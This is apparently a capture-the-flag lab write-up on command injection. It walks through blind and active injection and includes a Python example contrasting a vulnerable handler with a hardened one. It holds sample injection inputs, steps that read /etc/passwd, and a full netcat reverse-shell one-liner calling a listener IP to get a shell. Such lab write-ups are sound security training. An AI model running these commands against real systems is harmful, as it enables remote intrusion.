# Injection

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaE_26P8MCb44zUQxc%2Fimage.png?alt=media\&token=644f7ab0-87e8-4d4f-b9e4-b8449aa4fbb5)

## An introduction to Command Injection

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaEeHsyHSZ3qkOJHPt%2Fimage.png?alt=media\&token=aa3cc0d8-1d27-4e0a-a1c7-91bdcaf91a34)
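As an added example (not code from the room or this write-up), here is the pattern behind a command injection bug in Python, with the vulnerable form beside a hardened one: the vulnerable handler concatenates a form value into a string that is handed to the shell, so metacharacters such as `;` (chain a second command) and `>` (redirect output to a file, the trick used for blind injection) are interpreted by the shell; the hardened handler allowlists the value and passes it as a single argv element with no shell involved. The `ping` lookup and the function names are assumptions, and `metacharacters_in` is a small helper a defender can reuse for logging suspicious parameter values.

```python
import re
import subprocess

# Shell metacharacters that let a value break out of the intended command.
_META_RE = re.compile(r"[;&|`$<>(){}\n]")


def metacharacters_in(value: str) -> list[str]:
    """Return every shell metacharacter in value (useful for request logging)."""
    return _META_RE.findall(value)


def vulnerable_command(host: str) -> str:
    # Vulnerable form (assumed handler): the value is glued into a command
    # string that the app would run through /bin/sh (shell=True, passthru-style),
    # so "127.0.0.1; whoami" becomes two commands and "x > /tmp/out" a redirect.
    return "ping -c 1 " + host


# Allowlist: hostname labels or a dotted IPv4 literal, nothing else.
_HOST_RE = re.compile(
    r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def is_allowed_host(host: str) -> bool:
    """True only if host is a syntactically plain hostname/IPv4 of sane length."""
    return len(host) <= 253 and _HOST_RE.fullmatch(host) is not None


def safe_argv(host: str) -> list[str]:
    """Hardened form: validate first, then build an argv list (no shell parsing)."""
    if not is_allowed_host(host):
        raise ValueError(f"rejected input: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> subprocess.CompletedProcess:
    # shell=False: the host value reaches ping as one argument, verbatim.
    return subprocess.run(safe_argv(host), shell=False,
                          capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    # Constructed sample inputs: one legitimate value and two injection shapes.
    for value in ["127.0.0.1", "127.0.0.1; whoami", "x > /tmp/out"]:
        print(f"{value!r}: meta={metacharacters_in(value)} allowed={is_allowed_host(value)}")
```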

## Blind Command Injection

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaF9SVjRYR6CEzjCM4%2Fimage.png?alt=media\&token=c9ceab5a-e396-40b9-a920-db955bc37266)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaFSNcnmlRFwG73Q-I%2Fimage.png?alt=media\&token=def97b31-9d4e-4e5e-b6c5-14902df6adce)

Let's go to the webpage.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaFywoswht9gUrFoKG%2Fimage.png?alt=media\&token=9a1fd871-5054-466e-8346-df0fc43f6342)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaGhGE7RwZwq70jqLD%2Fimage.png?alt=media\&token=2317ea2a-a44b-4888-b2e1-e4a5dd02f3cc)

Let's try to find the kernel version, redirect it to a file, and then read the file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaItLmu5jwdU8MKFjy%2Fimage.png?alt=media\&token=62464579-7aa7-4f97-bbed-6d5510eb7a62)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJDFfzaZ30Gb0-hZh%2Fimage.png?alt=media\&token=3738a15d-0fcc-4233-8f81-8b12a68df461)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJNXqZKXLOOpioKvW%2Fimage.png?alt=media\&token=781774d2-9058-4b44-b4ec-920445a1d7f2)

Now let's enter root and look at the response for the answer to the next question.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJhCWnznWKsi90S50%2Fimage.png?alt=media\&token=991dbd19-7c82-4bd3-a9e7-dc5e353dfc2a)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJkJJUaWCr2WNsmjB%2Fimage.png?alt=media\&token=4278b850-7a75-4b61-a91e-870a0bf15bb2)

Now let's enter www-data.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJojs0xi77xXbfPe1%2Fimage.png?alt=media\&token=e73ced1b-39a8-4663-9336-e3508f50c393)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJrgDiFP2ZRySfVy7%2Fimage.png?alt=media\&token=3c029e44-8c0b-4c02-967d-b96e5eb2d1c9)

Let's enter our name and see what the output is.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJz3fBR0E4DHhkop8%2Fimage.png?alt=media\&token=80bdfb87-c8a6-4fec-8ed9-c8753962755c)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaK0n9AIxoHciErjqz%2Fimage.png?alt=media\&token=aae88067-6e8d-425b-bde4-cbdefaa210f2)

## Active Command Injection

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaKSp0mzxYVPLg-N1q%2Fimage.png?alt=media\&token=bbb71beb-074f-45c4-96f1-1ebf610736a6)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaKWD3d5yy_PsfN2Yp%2Fimage.png?alt=media\&token=8b3f4d0b-b61c-4bcb-9ac4-350d4f833893)

Let's go to the webpage that they mention.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaKd4fJA4Vg3CvaN0A%2Fimage.png?alt=media\&token=171698f0-f5cf-46cd-9f0f-491433929907)

Let's list the files with the ls command and see whether there is an interesting one.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaKt6xjeeOUV4wprJ2%2Fimage.png?alt=media\&token=8cedbd5c-4946-4395-8c52-595367e8350f)

There is an interesting file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaKyHng0ASNYHNdoWG%2Fimage.png?alt=media\&token=0d56f218-1f89-4f5c-9fdf-6ff5a9b7af1c)

To see how many users there are on the machine, we can read the /etc/passwd file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaLAM7MxFrGytAmfw1%2Fimage.png?alt=media\&token=9940fbbd-586d-408e-adb0-89e859433c48)

We can read this output more easily by viewing the page source.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaLK7g5QQ9jvlh0aDM%2Fimage.png?alt=media\&token=686b1773-6d90-4550-92f3-4dfda2be7290)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaLVRY0p7lCdttniYf%2Fimage.png?alt=media\&token=f0730a89-2441-4df7-8773-06f7d9819a6e)

We can see which user the app is running as with the whoami command.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaLgAuWf3NVLv5M84J%2Fimage.png?alt=media\&token=3d248e34-476c-4535-a2b8-aa5300f5121f)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaLjk2XRggRwnaQx26%2Fimage.png?alt=media\&token=b8e14693-854d-458e-8e47-460787efc196)

We can see what this user's shell is set to in the /etc/passwd file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaLzoB9RbBTchiPv3G%2Fimage.png?alt=media\&token=b8468129-ac47-4401-8f77-cfbcdaeddc9f)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaM5YheL988nkRGHK1%2Fimage.png?alt=media\&token=b882b4ef-33ec-43c6-862a-cc512d02c7f9)

We can see which version of Ubuntu is running with the command `lsb_release -a`.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaMOqE_ZC3TZtRKkCD%2Fimage.png?alt=media\&token=ee65ea9d-ef86-469a-8d35-a00edb29fd8b)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaMSX_Wgx7izL1pd9I%2Fimage.png?alt=media\&token=629aa40a-bc8f-46ec-847b-63c035f37298)

We can print out the MOTD with this command.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaMi0njl6p9Yu4xsSc%2Fimage.png?alt=media\&token=a18e4d89-423b-4cc0-98f8-60a46c6e8a58)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaMmGFwf-_Y4iomcOv%2Fimage.png?alt=media\&token=4fe36275-caa8-4576-ab35-e09611a784eb)

## Get the Flag!

Let's first get a reverse shell on the machine so that we can navigate it more easily.

First we start a netcat listener.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaNmfF9IWtYbeDDjy9%2Fimage.png?alt=media\&token=6e10d379-b376-4c6b-8d2b-177f0bbe2b5a)

Now we use the reverse shell command:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaNzJ3MyCN3IWeToHo%2Fimage.png?alt=media\&token=19486a26-0ea3-4773-b7e3-9bfa222017e5)

Let's hit Submit.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaO1xoNNQyM3euwW1f%2Fimage.png?alt=media\&token=e338a3da-2b48-4ffe-8b5f-ad5e814c1eb6)

We have a shell; let's stabilize it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaOJKjH6VP-D5R4gEl%2Fimage.png?alt=media\&token=f9118903-dec3-439f-9691-b5303e11a442)

Now let's look for the flag. It is probably a txt file called flag, so let's search for that:

```
find / -type f -name flag.txt 2>/dev/null
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaOkd9doUu_kTx-QGP%2Fimage.png?alt=media\&token=c6cdff6b-0f5b-4ab5-985e-10c3ef987a3e)

We have the flag; let's read it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaOrzaSOVlgxlwsGWB%2Fimage.png?alt=media\&token=80200110-e8b6-4bd5-9b6a-5b611ce8de2a)
